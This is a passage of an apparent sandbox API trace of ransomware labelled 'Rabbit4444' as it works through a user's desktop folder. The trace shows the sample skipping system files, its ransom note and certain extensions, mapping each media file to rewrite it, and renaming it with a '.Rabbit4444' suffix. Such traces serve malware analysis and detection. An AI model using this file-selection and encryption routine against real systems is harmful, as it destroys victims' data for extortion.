dwFileAttributes=0x0) returned 1 [0050.229] lstrlenW (lpString="qRf30E0va-Q5qcX8J.mp3") returned 21 [0050.229] lstrlenW (lpString="Rabbit4444") returned 10 [0050.229] lstrcmpiW (lpString1="5qcX8J.mp3", lpString2="Rabbit4444") returned -1 [0050.229] lstrlenW (lpString=".dll") returned 4 [0050.229] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0050.229] lstrlenW (lpString=".lnk") returned 4 [0050.229] lstrcmpiW (lpString1=".mp3", lpString2=".lnk") returned 1 [0050.229] lstrlenW (lpString=".ini") returned 4 [0050.229] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0050.229] lstrlenW (lpString=".sys") returned 4 [0050.229] lstrcmpiW (lpString1=".mp3", lpString2=".sys") returned -1 [0050.229] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\qRf30E0va-Q5qcX8J.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\ulu8b2weqpro\\qrf30e0va-q5qcx8j.mp3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.229] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.229] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14153982785) returned 1 [0050.229] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=2493) returned 1 [0050.229] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0050.229] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0050.229] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xcc0, lpName=0x0) returned 0x298 [0050.229] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xcc0) returned 0x70000 [0050.230] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.230] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0050.230] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.230] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0050.230] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.230] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0050.230] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.230] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0050.230] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14154093173) returned 1 [0050.230] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0050.230] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0050.230] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.230] CloseHandle (hObject=0x298) returned 1 [0050.230] CloseHandle (hObject=0x278) returned 1 [0050.232] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\qRf30E0va-Q5qcX8J.mp3.Rabbit4444") returned 69 [0050.232] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\qRf30E0va-Q5qcX8J.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\ulu8b2weqpro\\qrf30e0va-q5qcx8j.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\qRf30E0va-Q5qcX8J.mp3.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\desktop\\ulu8b2weqpro\\qrf30e0va-q5qcx8j.mp3.rabbit4444"), dwFlags=0x1) returned 1 [0050.233] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29bf1c70, ftCreationTime.dwHighDateTime=0x1d4c9ae, ftLastAccessTime.dwLowDateTime=0x9e7ee970, ftLastAccessTime.dwHighDateTime=0x1d4c885, ftLastWriteTime.dwLowDateTime=0x9e7ee970, ftLastWriteTime.dwHighDateTime=0x1d4c885, nFileSizeHigh=0x0, nFileSizeLow=0x189f4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rsSN39k30qsRCD.m4a", cAlternateFileName="RSSN39~1.M4A")) returned 1 [0050.233] lstrcmpiW (lpString1="rsSN39k30qsRCD.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.233] lstrcmpiW (lpString1="rsSN39k30qsRCD.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.233] lstrcmpiW (lpString1="rsSN39k30qsRCD.m4a", lpString2="Rabbit4444.exe") returned 1 [0050.233] lstrcmpiW (lpString1="rsSN39k30qsRCD.m4a", lpString2=".") returned 1 [0050.233] lstrcmpiW (lpString1="rsSN39k30qsRCD.m4a", lpString2="..") returned 1 [0050.233] lstrcmpiW (lpString1="rsSN39k30qsRCD.m4a", lpString2="windows") returned -1 [0050.233] lstrcmpiW (lpString1="rsSN39k30qsRCD.m4a", lpString2="bootmgr") returned 1 [0050.233] lstrcmpiW (lpString1="rsSN39k30qsRCD.m4a", lpString2="pagefile.sys") returned 1 [0050.233] lstrcmpiW (lpString1="rsSN39k30qsRCD.m4a", lpString2="boot") returned 1 [0050.233] lstrcmpiW (lpString1="rsSN39k30qsRCD.m4a", lpString2="ids.txt") returned 1 [0050.233] lstrcmpiW (lpString1="rsSN39k30qsRCD.m4a", lpString2="NTUSER.DAT") returned 1 [0050.233] lstrcpyW (in: lpString1=0x130eb82, lpString2="rsSN39k30qsRCD.m4a" | out: lpString1="rsSN39k30qsRCD.m4a") returned="rsSN39k30qsRCD.m4a" [0050.233] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\rsSN39k30qsRCD.m4a", dwFileAttributes=0x0) returned 1 [0050.233] lstrlenW (lpString="rsSN39k30qsRCD.m4a") returned 18 [0050.233] lstrlenW (lpString="Rabbit4444") returned 10 [0050.233] lstrcmpiW (lpString1="0qsRCD.m4a", lpString2="Rabbit4444") returned -1 [0050.233] lstrlenW (lpString=".dll") returned 4 [0050.233] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0050.233] lstrlenW (lpString=".lnk") returned 4 [0050.233] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0050.233] lstrlenW (lpString=".ini") returned 4 [0050.234] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0050.234] lstrlenW (lpString=".sys") returned 4 [0050.234] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0050.234] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\rsSN39k30qsRCD.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\ulu8b2weqpro\\rssn39k30qsrcd.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.234] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.234] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14154452489) returned 1 [0050.234] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=100852) returned 1 [0050.234] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0050.234] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1018d0 [0050.234] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x18d00, lpName=0x0) returned 0x298 [0050.234] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18d00) returned 0x70000 [0050.236] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.236] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0050.236] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.236] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0050.236] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.237] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0050.237] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.237] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0050.237] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14154753973) returned 1 [0050.237] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0050.237] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1018d0 | out: hHeap=0xe0000) returned 1 [0050.237] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.238] CloseHandle (hObject=0x298) returned 1 [0050.238] CloseHandle (hObject=0x278) returned 1 [0050.239] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\rsSN39k30qsRCD.m4a.Rabbit4444") returned 66 [0050.239] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\rsSN39k30qsRCD.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\ulu8b2weqpro\\rssn39k30qsrcd.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\rsSN39k30qsRCD.m4a.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\desktop\\ulu8b2weqpro\\rssn39k30qsrcd.m4a.rabbit4444"), dwFlags=0x1) returned 1 [0050.239] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a3712a0, ftCreationTime.dwHighDateTime=0x1d4cd58, ftLastAccessTime.dwLowDateTime=0xc627d0e0, ftLastAccessTime.dwHighDateTime=0x1d4c5ce, ftLastWriteTime.dwLowDateTime=0xc627d0e0, ftLastWriteTime.dwHighDateTime=0x1d4c5ce, nFileSizeHigh=0x0, nFileSizeLow=0xaeae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SabX6Zgr AAwOd.jpg", cAlternateFileName="SABX6Z~1.JPG")) returned 1 [0050.239] lstrcmpiW (lpString1="SabX6Zgr AAwOd.jpg", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.239] lstrcmpiW (lpString1="SabX6Zgr AAwOd.jpg", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.239] lstrcmpiW (lpString1="SabX6Zgr AAwOd.jpg", lpString2="Rabbit4444.exe") returned 1 [0050.239] lstrcmpiW (lpString1="SabX6Zgr AAwOd.jpg", lpString2=".") returned 1 [0050.239] lstrcmpiW (lpString1="SabX6Zgr AAwOd.jpg", lpString2="..") returned 1 [0050.239] lstrcmpiW (lpString1="SabX6Zgr AAwOd.jpg", lpString2="windows") returned -1 [0050.239] lstrcmpiW (lpString1="SabX6Zgr AAwOd.jpg", lpString2="bootmgr") returned 1 [0050.239] lstrcmpiW (lpString1="SabX6Zgr AAwOd.jpg", lpString2="pagefile.sys") returned 1 [0050.239] lstrcmpiW (lpString1="SabX6Zgr AAwOd.jpg", lpString2="boot") returned 1 [0050.239] lstrcmpiW (lpString1="SabX6Zgr AAwOd.jpg", lpString2="ids.txt") returned 1 [0050.239] lstrcmpiW (lpString1="SabX6Zgr AAwOd.jpg", lpString2="NTUSER.DAT") returned 1 [0050.239] lstrcpyW (in: lpString1=0x130eb82, lpString2="SabX6Zgr AAwOd.jpg" | out: lpString1="SabX6Zgr AAwOd.jpg") returned="SabX6Zgr AAwOd.jpg" [0050.240] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\SabX6Zgr AAwOd.jpg", dwFileAttributes=0x0) returned 1 [0050.240] lstrlenW (lpString="SabX6Zgr AAwOd.jpg") returned 18 [0050.240] lstrlenW (lpString="Rabbit4444") returned 10 [0050.240] lstrcmpiW (lpString1=" AAwOd.jpg", lpString2="Rabbit4444") returned -1 [0050.240] lstrlenW (lpString=".dll") returned 4 [0050.240] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0050.240] lstrlenW (lpString=".lnk") returned 4 [0050.240] lstrcmpiW (lpString1=".jpg", lpString2=".lnk") returned -1 [0050.240] lstrlenW (lpString=".ini") returned 4 [0050.240] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0050.240] lstrlenW (lpString=".sys") returned 4 [0050.240] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0050.240] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\SabX6Zgr AAwOd.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\ulu8b2weqpro\\sabx6zgr aawod.jpg"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.240] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.240] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14155090606) returned 1 [0050.240] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=44718) returned 1 [0050.240] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0050.240] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0050.240] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xb1b0, lpName=0x0) returned 0x298 [0050.241] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb1b0) returned 0x70000 [0050.243] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.243] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0050.243] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.243] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0050.243] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.243] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0050.243] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.243] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0050.243] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14155397518) returned 1 [0050.243] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0050.243] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0050.243] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.244] CloseHandle (hObject=0x298) returned 1 [0050.244] CloseHandle (hObject=0x278) returned 1 [0050.244] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\SabX6Zgr AAwOd.jpg.Rabbit4444") returned 66 [0050.244] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\SabX6Zgr AAwOd.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\ulu8b2weqpro\\sabx6zgr aawod.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\SabX6Zgr AAwOd.jpg.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\desktop\\ulu8b2weqpro\\sabx6zgr aawod.jpg.rabbit4444"), dwFlags=0x1) returned 1 [0050.245] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c481ee0, ftCreationTime.dwHighDateTime=0x1d4d267, ftLastAccessTime.dwLowDateTime=0x7d09ab50, ftLastAccessTime.dwHighDateTime=0x1d4d2bb, ftLastWriteTime.dwLowDateTime=0x7d09ab50, ftLastWriteTime.dwHighDateTime=0x1d4d2bb, nFileSizeHigh=0x0, nFileSizeLow=0x7deb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="u-KUQZAFiS.jpg", cAlternateFileName="U-KUQZ~1.JPG")) returned 1 [0050.245] lstrcmpiW (lpString1="u-KUQZAFiS.jpg", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.245] lstrcmpiW (lpString1="u-KUQZAFiS.jpg", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.245] lstrcmpiW (lpString1="u-KUQZAFiS.jpg", lpString2="Rabbit4444.exe") returned 1 [0050.245] lstrcmpiW (lpString1="u-KUQZAFiS.jpg", lpString2=".") returned 1 [0050.245] lstrcmpiW (lpString1="u-KUQZAFiS.jpg", lpString2="..") returned 1 [0050.245] lstrcmpiW (lpString1="u-KUQZAFiS.jpg", lpString2="windows") returned -1 [0050.245] lstrcmpiW (lpString1="u-KUQZAFiS.jpg", lpString2="bootmgr") returned 1 [0050.245] lstrcmpiW (lpString1="u-KUQZAFiS.jpg", lpString2="pagefile.sys") returned 1 [0050.245] lstrcmpiW (lpString1="u-KUQZAFiS.jpg", lpString2="boot") returned 1 [0050.245] lstrcmpiW (lpString1="u-KUQZAFiS.jpg", lpString2="ids.txt") returned 1 [0050.245] lstrcmpiW (lpString1="u-KUQZAFiS.jpg", lpString2="NTUSER.DAT") returned 1 [0050.245] lstrcpyW (in: lpString1=0x130eb82, lpString2="u-KUQZAFiS.jpg" | out: lpString1="u-KUQZAFiS.jpg") returned="u-KUQZAFiS.jpg" [0050.245] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\u-KUQZAFiS.jpg", dwFileAttributes=0x0) returned 1 [0050.245] lstrlenW (lpString="u-KUQZAFiS.jpg") returned 14 [0050.245] lstrlenW (lpString="Rabbit4444") returned 10 [0050.245] lstrcmpiW (lpString1="QZAFiS.jpg", lpString2="Rabbit4444") returned -1 [0050.246] lstrlenW (lpString=".dll") returned 4 [0050.246] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0050.246] lstrlenW (lpString=".lnk") returned 4 [0050.246] lstrcmpiW (lpString1=".jpg", lpString2=".lnk") returned -1 [0050.246] lstrlenW (lpString=".ini") returned 4 [0050.246] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0050.246] lstrlenW (lpString=".sys") returned 4 [0050.246] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0050.246] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\u-KUQZAFiS.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\ulu8b2weqpro\\u-kuqzafis.jpg"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.246] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.246] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14155664679) returned 1 [0050.246] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=32235) returned 1 [0050.246] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0050.246] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101628 [0050.246] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x80f0, lpName=0x0) returned 0x298 [0050.246] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x80f0) returned 0x70000 [0050.248] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.248] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0050.248] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.248] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0050.248] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.248] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0050.248] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.248] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0050.248] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14155876134) returned 1 [0050.248] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0050.248] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101628 | out: hHeap=0xe0000) returned 1 [0050.248] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.248] CloseHandle (hObject=0x298) returned 1 [0050.249] CloseHandle (hObject=0x278) returned 1 [0050.249] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\u-KUQZAFiS.jpg.Rabbit4444") returned 62 [0050.249] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\u-KUQZAFiS.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\ulu8b2weqpro\\u-kuqzafis.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\u-KUQZAFiS.jpg.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\desktop\\ulu8b2weqpro\\u-kuqzafis.jpg.rabbit4444"), dwFlags=0x1) returned 1 [0050.250] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7bb69cd0, ftCreationTime.dwHighDateTime=0x1d4d0aa, ftLastAccessTime.dwLowDateTime=0x8a3f70e0, ftLastAccessTime.dwHighDateTime=0x1d4cc15, ftLastWriteTime.dwLowDateTime=0x8a3f70e0, ftLastWriteTime.dwHighDateTime=0x1d4cc15, nFileSizeHigh=0x0, nFileSizeLow=0x1575a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WcVaPByj3hFUdu9J.wav", cAlternateFileName="WCVAPB~1.WAV")) returned 1 [0050.250] lstrcmpiW (lpString1="WcVaPByj3hFUdu9J.wav", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.250] lstrcmpiW (lpString1="WcVaPByj3hFUdu9J.wav", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.250] lstrcmpiW (lpString1="WcVaPByj3hFUdu9J.wav", lpString2="Rabbit4444.exe") returned 1 [0050.250] lstrcmpiW (lpString1="WcVaPByj3hFUdu9J.wav", lpString2=".") returned 1 [0050.250] lstrcmpiW (lpString1="WcVaPByj3hFUdu9J.wav", lpString2="..") returned 1 [0050.250] lstrcmpiW (lpString1="WcVaPByj3hFUdu9J.wav", lpString2="windows") returned -1 [0050.250] lstrcmpiW (lpString1="WcVaPByj3hFUdu9J.wav", lpString2="bootmgr") returned 1 [0050.250] lstrcmpiW (lpString1="WcVaPByj3hFUdu9J.wav", lpString2="pagefile.sys") returned 1 [0050.250] lstrcmpiW (lpString1="WcVaPByj3hFUdu9J.wav", lpString2="boot") returned 1 [0050.250] lstrcmpiW (lpString1="WcVaPByj3hFUdu9J.wav", lpString2="ids.txt") returned 1 [0050.250] lstrcmpiW (lpString1="WcVaPByj3hFUdu9J.wav", lpString2="NTUSER.DAT") returned 1 [0050.250] lstrcpyW (in: lpString1=0x130eb82, lpString2="WcVaPByj3hFUdu9J.wav" | out: lpString1="WcVaPByj3hFUdu9J.wav") returned="WcVaPByj3hFUdu9J.wav" [0050.250] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\WcVaPByj3hFUdu9J.wav", dwFileAttributes=0x0) returned 1 [0050.250] lstrlenW (lpString="WcVaPByj3hFUdu9J.wav") returned 20 [0050.250] lstrlenW (lpString="Rabbit4444") returned 10 [0050.250] lstrcmpiW (lpString1="FUdu9J.wav", lpString2="Rabbit4444") returned -1 [0050.250] lstrlenW (lpString=".dll") returned 4 [0050.250] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0050.250] lstrlenW (lpString=".lnk") returned 4 [0050.250] lstrcmpiW (lpString1=".wav", lpString2=".lnk") returned 1 [0050.251] lstrlenW (lpString=".ini") returned 4 [0050.251] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0050.251] lstrlenW (lpString=".sys") returned 4 [0050.251] lstrcmpiW (lpString1=".wav", lpString2=".sys") returned 1 [0050.251] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\WcVaPByj3hFUdu9J.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\ulu8b2weqpro\\wcvapbyj3hfudu9j.wav"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.251] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.251] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14156154271) returned 1 [0050.251] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=87898) returned 1 [0050.251] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0050.251] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0050.251] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x15a60, lpName=0x0) returned 0x298 [0050.251] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x15a60) returned 0x70000 [0050.253] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.253] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0050.253] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.253] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 